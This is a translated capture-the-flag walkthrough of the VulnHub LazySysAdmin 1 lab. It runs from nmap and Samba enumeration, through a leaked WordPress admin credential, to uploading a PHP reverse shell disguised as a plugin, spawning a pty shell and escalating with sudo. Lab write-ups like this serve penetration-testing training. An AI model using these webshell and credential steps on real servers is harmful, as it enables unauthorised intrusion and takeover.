Table of contents
introduce
Series: LazySysAdmin (1 unit in this series)
Release date: September 20, 2017
Difficulty: Beginner
Operating environment: VMware Workstation
Goal: Obtain Root permissions
Learning:
- Samba sensitive information leaked
- wordpress hangs horse
Target drone address: https://www.vulnhub.com/entry/lazysysadmin-1,205/
collect message
netdiscover host discovery
sudo netdiscover -i eth0 -r 192.168.229.0/24
Host information detection
found that SSH is running on port 777
nmap -p- 192.168.229.144
nmap -p 22,80,139,445,3306,6667 -A 192.168.229.144
nmap -p 22,80,139,445,3306,6667 --script=vuln 192.168.229.144
Test samba security
Found a shared directory with read-only permissions and logged in using an empty password. As a result, many file directories were found.
smbmap -H 192.168.229.144
smbclient //192.168.229.144/share$
Use get to download the files you are interested in.
Find an account password through the configuration file: Admin/TogieMYSQL12345^^
. There is also a password: 12345
Login to the website
The homepage of the website is a static page with no valuable information.
After a simple directory blast, I discovered wordpress: dirsearch -u http://192.168.229.144/ --full-url -x 404,403
the content on the page kept telling us that his name is togie, so let’s try logging in next.
Access the default backend address: http://192.168.229.144/wordpress/wp-admin
and Admin/TogieMYSQL12345^^
log in successfully.
Attackers often use the plug-in function to rebound the shell. Let’s start to demonstrate a process of using WordPress to get the shell.
zip self-extracting webshell
- Download the file for the rebound shell
https://pentestmonkey.net/tools/web-shells/php-reverse-shell
wget http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz
gunzip php-reverse-shell-1.0.tar.gz
tar xvf php-reverse-shell-1.0.tar
cp php-reverse-shell-1.0/php-reverse-shell.php ./
vim php-reverse-shell.php
zip sh.zip php-reverse-shell.php
This file has been built into kali and is located at: /usr/share/webshells/php/php-reverse-shell.php
- Edit file
Set the address and port of the rebound shell.
Edit the header file of the fake plug-in. This step is optional.
- Install plugin
Shows successful installation
- Get shell
http://192.168.229.144/wordpress/wp-content/plugins/sh/php-reverse-shell.php
Elevate privileges
First fix the shell:
python -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm-color
I found that I could escalate the privileges to togie, and then sudo escalated the privileges.